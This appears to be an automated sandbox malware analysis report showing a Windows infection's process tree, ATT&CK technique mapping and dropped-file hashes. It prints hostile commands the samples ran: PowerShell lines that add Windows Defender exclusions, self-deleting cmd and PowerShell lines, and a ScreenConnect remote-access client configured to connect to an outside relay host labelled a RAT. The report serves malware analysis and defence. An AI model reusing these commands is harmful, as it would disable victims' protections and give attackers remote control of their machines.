C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 4 -isForBrowser -prefsHandle 5456 -prefMapHandle 5460 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3af0dfcf-ccc9-425a-a807-1f2dc344be78} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:7780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5652 -childID 5 -isForBrowser -prefsHandle 5660 -prefMapHandle 5664 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0aab67ed-1f1b-4e5a-8e5d-81ac94709ad2} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:6200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017721001\7d3ca92efa.exe"C:\Users\Admin\AppData\Local\Temp\1017721001\7d3ca92efa.exe"6⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7872
-
-
C:\Users\Admin\AppData\Local\Temp\1017722001\cfb5c42bfd.exe"C:\Users\Admin\AppData\Local\Temp\1017722001\cfb5c42bfd.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\xnjuo"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:7928
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6712
-
-
C:\xnjuo\bbfa9a48763748409ab9f84a4b4d1cca.exe"C:\xnjuo\bbfa9a48763748409ab9f84a4b4d1cca.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:7768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\xnjuo\bbfa9a48763748409ab9f84a4b4d1cca.exe" & rd /s /q "C:\ProgramData\LN7YM79RI58Q" & exit8⤵
- System Location Discovery: System Language Discovery
PID:5192 -
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2652
-
-
-
-
C:\xnjuo\716b2bf6d0ea4bc89dd192d17a90ce2f.exe"C:\xnjuo\716b2bf6d0ea4bc89dd192d17a90ce2f.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:5464 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi8⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4324 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffe5c9546f8,0x7ffe5c954708,0x7ffe5c9547189⤵PID:3068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:29⤵PID:7148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:39⤵PID:900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:89⤵PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:19⤵PID:2024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:19⤵PID:5196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:89⤵PID:6792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:89⤵PID:7256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:19⤵PID:6184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:19⤵PID:5332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:19⤵PID:5040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:19⤵PID:8084
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017723001\fd4b71514b.exe"C:\Users\Admin\AppData\Local\Temp\1017723001\fd4b71514b.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\1017723001\fd4b71514b.exe"C:\Users\Admin\AppData\Local\Temp\1017723001\fd4b71514b.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8080
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017724001\70a82b2704.exe"C:\Users\Admin\AppData\Local\Temp\1017724001\70a82b2704.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7036 -s 15407⤵
- Program crash
PID:8932
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017725001\cedb729c19.exe"C:\Users\Admin\AppData\Local\Temp\1017725001\cedb729c19.exe"6⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\1017726001\e200e74b60.exe"C:\Users\Admin\AppData\Local\Temp\1017726001\e200e74b60.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:8680 -
C:\Users\Admin\AppData\Local\Temp\1017726001\e200e74b60.exe"C:\Users\Admin\AppData\Local\Temp\1017726001\e200e74b60.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7720
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017727001\c1de1e1e88.exe"C:\Users\Admin\AppData\Local\Temp\1017727001\c1de1e1e88.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6360
-
-
C:\Users\Admin\AppData\Local\Temp\1017728001\b7a1e2f349.exe"C:\Users\Admin\AppData\Local\Temp\1017728001\b7a1e2f349.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7284 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 7687⤵
- Program crash
PID:3896
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017729001\1048c089ab.exe"C:\Users\Admin\AppData\Local\Temp\1017729001\1048c089ab.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\zjoph"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:7528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:8244
-
-
C:\zjoph\3dbe003be11c428091b74912c836eb73.exe"C:\zjoph\3dbe003be11c428091b74912c836eb73.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:9456
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2q4507.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2q4507.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Z30a.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Z30a.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C806m.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C806m.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4CEB5F8445E94D24B4F103FC96092E26 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI38ED.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240662906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2832
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:7444
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4B5510EDE44EE29DCF8F6CF2B26E5CB42⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5356
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CD2F7BF02763CA4E467993BB99F5B646 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:7008
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3488
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4752
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1980
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=gips620.top&p=8880&s=71ab53b0-a752-4e29-a927-f54fa80db420&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6264 -
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "62d71e6d-5a9b-4cbc-b08e-4cb204c84654" "User"2⤵
- Executes dropped EXE
- Modifies registry class
PID:7224
-
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "1cac55b9-e38b-4f19-a349-7d1c64e10b43" "System"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:7512
-
-
C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe" "RunRole" "1be0c2fe-9b82-49aa-bc52-0a3de26093f5" "System"2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5028
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5704
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5812
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5160
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3940
-
C:\Users\Admin\Documents\Support\Files\fire.exe"C:\Users\Admin\Documents\Support\Files\fire.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2992
-
C:\Users\Admin\Documents\Support\Files\fire.exe"C:\Users\Admin\Documents\Support\Files\fire.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7036 -ip 70361⤵PID:8776
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5620
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7800 -
C:\Windows\explorer.exeexplorer.exe2⤵PID:5848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2080 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1116
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7284 -ip 72841⤵PID:5784
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
4Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
5Credentials In Files
5Discovery
Browser Information Discovery
1Peripheral Device Discovery
2Query Registry
11Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
214KB
MD5a8b27ea11cd9134178b96a8524123806
SHA194266157e5d30e7b4ef7f3a74218159d5b50109d
SHA2564295e6bd14c9bc97ffc411f4c37ded2f5eb4169c5c2c9c3750928cbe3acf7e31
SHA512596ae9eba893bb28c56cbeb941c92c67ba86956c01bd96a0d664b70397ff0588b28d17c556e7f00e9a2c690aa3d7ddd87de9c5e37098ad1c50129132ef194fdb
-
Filesize
66KB
MD55db908c12d6e768081bced0e165e36f8
SHA1f2d3160f15cfd0989091249a61132a369e44dea4
SHA256fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
SHA5128400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
-
Filesize
93KB
MD575b21d04c69128a7230a0998086b61aa
SHA1244bd68a722cfe41d1f515f5e40c3742be2b3d1d
SHA256f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
SHA5128d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2
-
Filesize
1KB
MD58ec831f3e3a3f77e4a7b9cd32b48384c
SHA1d83f09fd87c5bd86e045873c231c14836e76a05c
SHA2567667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA51226bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
152B
MD5443a627d539ca4eab732bad0cbe7332b
SHA186b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA2561e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d
-
Filesize
152B
MD599afa4934d1e3c56bbce114b356e8a99
SHA13f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA25608e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA51276686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da
-
Filesize
152B
MD5f847835f14aa96ac4c182fa8472a523e
SHA14c4dcda6aaedd535b5ffea64df201aea6cd0148c
SHA256e62a4813140b8648ad5966d42d16b694ac371e3cf897873063f66b3821903f5f
SHA5126080291a9c3a380fb9b22e2e6eae561e5dca21744b506fdd4e6e97d99d9fd944d0fee13338d76b4a4b5f6444583907a9d7af8f134fd0618ad24577387a77ea61
-
Filesize
152B
MD5bf82b4a6b99718086a372e9d25d0e5eb
SHA15ea160f1affa1b3e26cbffff73be789e2fde6566
SHA256b1b0c08611eb30814aed584122f9b21750afbf71f17ab028e2920787b2541ffa
SHA5125e2acb715535aab38d7b0f2bc2d34ec0b72be1a944939308900bd31cd0049d8184675ab7cc4183103a6d4f424e6b46040104e49b9886b87372b10cde51fb38c8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\78f48974-5a17-4ec5-8e43-f4744ff5cbc8.tmp
Filesize6KB
MD5035e6989b3accc710d08f7d54b7a5f70
SHA1a5aa263fd0b0acb617f4863657d5834ef17bb7dc
SHA256a09e6e164348b81ea2ce0deba10da80a5047c80c323c921327e831e145435d36
SHA512c292946e475fb3d74a57bf9d14be653a9f3ec08f6f1a472d0197782e1dd7776cbaa1cd1637c9a38d9538cc0f3974065c5c2b88b2ad05a2d22f5606d6edf5bb9a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize96B
MD5be1035f13cbb844761712eef9f680680
SHA116bb6fd2788bcc39ac0898ccc489077c9dcde7e9
SHA25648a94639bbbaf28ee1c2dffb5d670d15549e3eb04fa3b665d16bb4277980a2d2
SHA512502f2ba8dda1e23ac174026499da804a12f2e4b4dfa9c0428f58def93a26ac5450392f22ddcc89067b5a33140311848dd789418c016c487e22c8d0765a4bed73
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize96B
MD5a93b5a6679442f18168f7dc8977f0643
SHA147a08793aee4d47d5ebbc093a66be8983de55bb9
SHA256b810d1184ca7f0f7b55131b6ffad031a8f568dddc77ffab915bc2a7ce0539721
SHA512808561d2ec42b4bf214f74daf3a9680671893d7983897adb2e7a8d35292f03714c838075e38faed38e0c1a34d74e458c25fbcd3ca37f13736eb8053f03c31e47
-
Filesize
6KB
MD51b6e8ca75cfef9f461cc37cd0cbe75f9
SHA1d232c5444f5b1356f20cfd627c2a1a6d9182cc34
SHA2569f9d105f2c17db4ca0da7a3a310040bf3dfe1653a31687d0adb5819f13cbb7fd
SHA51236f3f642ce719763f4a187c19fc9e425a576bd5cb01890c3fd8b50f48b2461894845ab9ea758586962e0bdfbff0f17bd7c5f516cd53054ce758629bdc3fb039f
-
Filesize
5KB
MD5bf9c047f5de6d8e7a660cca2374583e9
SHA1a195efea801b8ad79ba8c663cadb667b055150d4
SHA256fcd1fb1cf6ad8c94f2381c184ffa2a889b61fa51ec5418c9130e23de741b50d3
SHA5124517a3c843c15ea20ba33500068b5b17c0ebd48265c1be97e05faf59e34d9d783ad515461d2536505a045fa3af26fe21fdde3d8c389bbc718436e92fc3e847ad
-
Filesize
6KB
MD5bb7c9c8d43131d31dd16a4819116748f
SHA16dd8ca104838c0aada0c5f2436b1b1d5eb254a70
SHA256d737fc4417e9242d012651b4d1bfe162cbfedb31ce60377435fc0e89afe06e4a
SHA51283c0ecfc7befde51fc316a8293a784f61b4693b091fb51962c0df4d385ceb5c5110aa0eb021672030b451eefd09e2a9a91e951dbc455cdb740da496fcca4d41c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\a0a74304db73132d4bc12ef9404aa74f9fdeda56\3cb19796-e97a-433d-b409-81621ed07b73\index
Filesize24B
MD554cb446f628b2ea4a5bce5769910512e
SHA1c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
